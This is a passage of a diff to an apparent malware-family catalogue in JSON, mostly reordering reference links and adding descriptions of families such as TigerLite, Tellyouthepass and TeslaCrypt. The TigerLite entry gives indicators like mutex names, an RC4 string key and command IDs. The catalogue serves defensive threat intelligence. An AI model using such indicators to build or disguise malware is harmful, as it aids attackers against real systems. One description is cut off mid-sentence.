"https://www.secureworks.com/research/srizbi", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", "https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html", - "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf" + "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel" ], "synonyms": [], "type": [] @@ -46536,16 +48728,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor", - "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://blog.reversinglabs.com/blog/taidoor-a-truly-persistent-threat", "https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf", "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a", - "https://blog.reversinglabs.com/blog/taidoor-a-truly-persistent-threat", - "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html", + "https://www.nttsecurity.com/docs/librariesprovider3/resources/taidoor%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%E6%A8%99%E7%9A%84%E5%9E%8B%E6%94%BB%E6%92%83%E8%A7%A3%E6%9E%90%E3%83%AC%E3%83%9D%E3%83%BC%E3%83%88_v1", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", - "https://www.nttsecurity.com/docs/librariesprovider3/resources/taidoor%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%E6%A8%99%E7%9A%84%E5%9E%8B%E6%94%BB%E6%92%83%E8%A7%A3%E6%9E%90%E3%83%AC%E3%83%9D%E3%83%BC%E3%83%88_v1" + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a" ], "synonyms": [ "simbot" @@ -46612,13 +48804,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.targetcompany", - "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-targetcompany-ransomware-victims/", - "https://decoded.avast.io/threatresearch/decrypted-targetcompany-ransomware/", "https://securityaffairs.co/wordpress/127761/malware/targetcompany-ransomware-decryptor.html", + "https://decoded.avast.io/threatresearch/decrypted-targetcompany-ransomware/", + "https://unit42.paloaltonetworks.com/mallox-ransomware/", + "https://asec.ahnlab.com/en/39152/", + "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-targetcompany-ransomware-victims/", "https://www.sangfor.com/blog/cybersecurity/new-threat-mallox-ransomware", - "https://id-ransomware.blogspot.com/2021/06/tohnichi-ransomware.html", + "https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/", "https://blog.cyble.com/2022/12/08/mallox-ransomware-showing-signs-of-increased-activity/", - "https://asec.ahnlab.com/en/39152/" + "https://id-ransomware.blogspot.com/2021/06/tohnichi-ransomware.html", + "https://www.trendmicro.com/en_us/research/23/f/xollam-the-latest-face-of-targetcompany.html" ], "synonyms": [ "Fargo", @@ -46648,13 +48843,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer", - "https://blog.minerva-labs.com/taurus-stealers-evolution", - "https://www.aon.com/cyber-solutions/aon_cyber_labs/agentvx-and-taurus/", - "https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/an-in-depth-analysis-of-the-new-taurus-stealer/", "https://www.zscaler.com/blogs/research/taurus-new-stealer-town", + "https://blog.minerva-labs.com/taurus-stealers-evolution", "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", - "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md" + "https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers", + "https://www.secureworks.com/research/the-growing-threat-from-infostealers", + "https://www.aon.com/cyber-solutions/aon_cyber_labs/agentvx-and-taurus/", + "https://outpost24.com/blog/an-in-depth-analysis-of-the-new-taurus-stealer/" ], "synonyms": [], "type": [] @@ -46684,8 +48881,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer", "https://securityintelligence.com/hammertoss-what-me-worry/", "https://www.youtube.com/watch?v=UE9suwyuic8", - "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58", - "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf", + "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58" ], "synonyms": [ "HAMMERTOSS", @@ -46713,8 +48910,7 @@ "description": "Recently, Check Point researchers spotted a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. The attack, which starts with a malicious attachment disguised as a top secret US document, weaponizes TeamViewer, the popular remote access and desktop sharing software, to gain full control of the infected computer.\r\nThis is achieved by sideloading another DLL among the legit TeamViewer.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.teambot", - "https://research.checkpoint.com/finteam-trojanized-teamviewer-against-government-targets/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.teambot" ], "synonyms": [ "FINTEAM" @@ -46729,10 +48925,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teamspy", - "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/", - "https://www.deepinstinct.com/blog/the-russian-spyagent-a-decade-later-and-rat-tools-remain-at-risk", - "https://blog.trendmicro.com/trendlabs-security-intelligence/unsupported-teamviewer-versions-exploited-backdoors-keylogging", "https://blog.avast.com/a-deeper-look-into-malware-abusing-teamviewer", + "https://www.deepinstinct.com/blog/the-russian-spyagent-a-decade-later-and-rat-tools-remain-at-risk", + "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/unsupported-teamviewer-versions-exploited-backdoors-keylogging", "https://www.cyber.nj.gov/threat-center/threat-profiles/trojan-variants/spy-agent" ], "synonyms": [ @@ -46746,42 +48942,42 @@ "value": "TeamSpy" }, { - "description": "TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file “gracious_truth.jpg”, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. FireEye believe that this was used to execute a customized Cobalt Strike BEACON.", + "description": "TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file \u201cgracious_truth.jpg\u201d, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. FireEye believe that this was used to execute a customized Cobalt Strike BEACON.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teardrop", - "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714", - "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html", "https://www.brighttalk.com/webcast/7451/462719", "https://github.com/fireeye/sunburst_countermeasures", - "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/", - "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/", - "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline", - "https://twitter.com/TheEnergyStory/status/1346096298311741440", - "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds", - "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b", - "https://twitter.com/craiu/status/1339954817247158272", - "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", - "https://www.youtube.com/watch?v=LA-XE5Jy2kU", "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader", - "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515", - "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", - "https://www.youtube.com/watch?v=GfbxHy6xnbA", - "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf", - "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate", - "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/", - "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", + "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html", "https://twitter.com/TheEnergyStory/status/1342041055563313152", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/", + "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate", + "https://www.youtube.com/watch?v=GfbxHy6xnbA", + "https://twitter.com/craiu/status/1339954817247158272", + "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714", + "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/", + "https://www.youtube.com/watch?v=LA-XE5Jy2kU", + "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", + "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/", + "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more", + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf", + "https://twitter.com/TheEnergyStory/status/1346096298311741440", + "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", "https://unit42.paloaltonetworks.com/atoms/solarphoenix/", "https://www.mandiant.com/resources/unc2452-merged-into-apt29", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/" + "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf", + "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline" ], "synonyms": [], "type": [] @@ -46833,11 +49029,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot", - "https://www.secureworks.com/research/threat-profiles/iron-viking", + "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks" + "https://www.secureworks.com/research/threat-profiles/iron-viking" ], "synonyms": [], "type": [] @@ -46850,9 +49046,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor", - "https://www.secureworks.com/research/threat-profiles/iron-viking", + "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html", "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/", - "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html" + "https://www.secureworks.com/research/threat-profiles/iron-viking" ], "synonyms": [], "type": [] @@ -46900,7 +49096,7 @@ "value": "Teleport" }, { - "description": "", + "description": "According to PCrisk, Tellyouthepass is one of many ransomware-type programs used to block access to files by encryption and keep them in this state unless a ransom is paid.\r\n\r\nThe program renames all encrypted files by adding the \".locked\" extension and creates a ransom message in a text file called \"README.html\". For example, \"1.jpg\" is renamed by Tellyouthepass to \"1.jpg.locked\".\r\n\r\nAccording to cyber criminals, this ransomware encrypts data using RSA-1024 and AES-256 cryptography algorithms.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tellyouthepass", @@ -46943,10 +49139,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat", - "https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf", - "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", - "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf" + "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf", + "https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf" ], "synonyms": [ "Fakem RAT" @@ -46962,8 +49158,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.termite", "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", - "https://www.mandiant.com/resources/evolution-of-fin7", - "https://www.alienvault.com/blogs/labs-research/internet-of-termites" + "https://www.alienvault.com/blogs/labs-research/internet-of-termites", + "https://www.mandiant.com/resources/evolution-of-fin7" ], "synonyms": [], "type": [] @@ -46976,9 +49172,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.terrapreter", - "https://www.esentire.com/web-native-pages/unmasking-venom-spider", + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire", - "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/" + "https://www.esentire.com/web-native-pages/unmasking-venom-spider" ], "synonyms": [], "type": [] @@ -46992,11 +49188,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_loader", "https://medium.com/walmartglobaltech/a-re-look-at-the-terraloader-dropper-dll-e5947ad6e244", - "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware", - "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-", "https://www.esentire.com/web-native-pages/unmasking-venom-spider", - "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire", - "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/" + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-", + "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/", + "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware", + "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire" ], "synonyms": [], "type": [] @@ -47027,10 +49223,10 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_stealer", "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://github.com/eset/malware-ioc/tree/master/evilnum", - "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", "https://twitter.com/3xp0rtblog/status/1275746149719252992", - "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/" + "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/", + "https://github.com/eset/malware-ioc/tree/master/evilnum", + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/" ], "synonyms": [ "SONE", @@ -47047,9 +49243,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_tv", - "https://blog.minerva-labs.com/taurus-user-guided-infection", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "https://blog.minerva-labs.com/taurus-user-guided-infection", "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9" ], "synonyms": [ @@ -47061,21 +49257,21 @@ "value": "TerraTV" }, { - "description": "", + "description": "According to Kaspersky, detected in February 2015, the new ransomware Trojan gained immediate notoriety as a menace to computer gamers. Amongst other types of target files, it tries to infect typical gaming files: game saves, user profiles, recoded replays etc. That said, TeslaCrypt does not encrypt files that are larger than 268 MB. Recently,", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt", - "https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/", - "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla", - "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/", - "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/", - "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/", "https://blogs.cisco.com/security/talos/teslacrypt", - "https://blog.christophetd.fr/malware-analysis-lab-with-virtualbox-inetsim-and-burp/", - "https://community.riskiq.com/article/30f22a00", - "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html", + "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/", "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf", - "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack" + "https://community.riskiq.com/article/30f22a00", + "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/", + "https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/", + "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html", + "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla", + "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/", + "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack", + "https://blog.christophetd.fr/malware-analysis-lab-with-virtualbox-inetsim-and-burp/" ], "synonyms": [ "cryptesla" @@ -47090,9 +49286,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower", - "https://www.sygnia.co/mata-framework", "https://cyber.gc.ca/en/alerts/tflower-ransomware-campaign", - "https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/" + "https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/", + "https://www.sygnia.co/mata-framework" ], "synonyms": [], "type": [] @@ -47174,15 +49370,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/", - "https://www.bleepingcomputer.com/news/security/thunderx-ransomware-rebrands-as-ranzy-locker-adds-data-leak-site/", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", "https://www.picussecurity.com/resource/blog/a-detailed-walkthrough-of-ranzy-locker-ransomware-ttps", + "https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://www.bleepingcomputer.com/news/security/thunderx-ransomware-rebrands-as-ranzy-locker-adds-data-leak-site/", "https://www.ic3.gov/Media/News/2021/211026.pdf", "https://id-ransomware.blogspot.com/2020/08/thunderx-ransomware.html", "https://www.mandiant.com/resources/chasing-avaddon-ransomware", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/" + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3" ], "synonyms": [ "Ranzy Locker" @@ -47209,9 +49405,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool", + "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/", "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/", "https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs", - "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/", "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf" ], "synonyms": [], @@ -47220,18 +49416,38 @@ "uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca", "value": "Tidepool" }, + { + "description": "TigerLite is a TCP downloader.\r\n\r\nIt creates mutexes like \"qtrgads32\" or \"Microsoft32\".\r\n\r\nIt uses RC4 with the key \"MicrosoftCorporationValidation@#$%^&*()!US\" for decryption of its character strings, and a custom algorithm for encryption and decryption of network traffic. \r\n\r\nIt supports from 5 up to 8 commands with the following identifiers: 1111, 1234, 2099/3333, 4444, 8877, 8888, 9876, 9999. The commands mostly perform various types of execution - either of code received from the server, or native Windows commands, with their output collected and sent back to the server.\r\n\r\nTigerLite is an intermediate step of a multi-stage attack, in which Tiger RAT is usually the next step. This malware was observed in attacks against South Korean entities in H1 2021.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tigerlite", + "https://threatray.com/wp-content/uploads/2021/12/threatray-establishing-the-tigerrat-and-tigerdownloader-malware-families.pdf", + "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/", + "https://ti.qianxin.com/blog/articles/Analysis-of-attacks-by-Lazarus-using-Daewoo-shipyard-as-bait/", + "https://www.malwarebytes.com/blog/threat-intelligence/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1fcd1afe-31ed-40c2-9262-6a6afe2a43e9", + "value": "TigerLite" + }, { "description": "This is third stage backdoor mentioned in the Kaspersky blog, \"Andariel evolves to target South Korea with ransomware\". The third stage payload was created via the second stage payload, is interactively executed in the operation and exists in both x64 and x86 versions. Most of them use Internet Explorer or Google Chrome icons and corresponding file names to disguise themselves as legitimate internet browsers. The malware decrypts the embedded payload at runtime. It uses an embedded 16-byte XOR key to decrypt the base64 encoded payload. The decrypted payload is another portable executable file that runs in memory. Before getting decrypted with a hardcoded XOR key, the backdoor also checks for sandbox environment.\r\nThe backdoor has some code overlap with a know malware family PEBBLEDASH, attributed to Lazarus/LABYRINTH CHOLLIMA.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiger_rat", - "https://www.attackiq.com/2023/01/05/emulating-the-highly-sophisticated-north-korean-adversary-lazarus-group/", + "https://asec.ahnlab.com/wp-content/uploads/2021/11/Lazarus-%EA%B7%B8%EB%A3%B9%EC%9D%98-NukeSped-%EC%95%85%EC%84%B1%EC%BD%94%EB%93%9C-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C.pdf", "https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html", - "https://threatray.com/wp-content/uploads/2021/12/threatray-establishing-the-tigerrat-and-tigerdownloader-malware-families.pdf", - "https://www.brighttalk.com/webcast/18282/493986", - "https://www.krcert.or.kr/filedownload.do?attach_file_seq=3277&attach_file_id=EpF3277.pdf", + "https://asec.ahnlab.com/ko/56256/", "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/", - "https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html" + "https://www.krcert.or.kr/filedownload.do?attach_file_seq=3277&attach_file_id=EpF3277.pdf", + "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF", + "https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html", + "https://www.attackiq.com/2023/01/05/emulating-the-highly-sophisticated-north-korean-adversary-lazarus-group/", + "https://www.brighttalk.com/webcast/18282/493986", + "https://threatray.com/wp-content/uploads/2021/12/threatray-establishing-the-tigerrat-and-tigerdownloader-malware-families.pdf", + "https://asec.ahnlab.com/en/56405/" ], "synonyms": [], "type": [] @@ -47257,20 +49473,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba", - "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html", - "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf", + "https://adalogics.com/blog/the-state-of-advanced-code-injections", "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant", - "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/", - "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/", - "http://garage4hackers.com/entry.php?b=3086", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "https://blogs.blackberry.com/en/2019/03/blackberry-cylance-vs-tinba-banking-trojan", - "http://contagiodump.blogspot.com/2012/06/amazon.html", "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html", + "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/", + "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html", + "http://garage4hackers.com/entry.php?b=3086", + "https://blogs.blackberry.com/en/2019/03/blackberry-cylance-vs-tinba-banking-trojan", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf", "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/", - "https://adalogics.com/blog/the-state-of-advanced-code-injections" + "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html", + 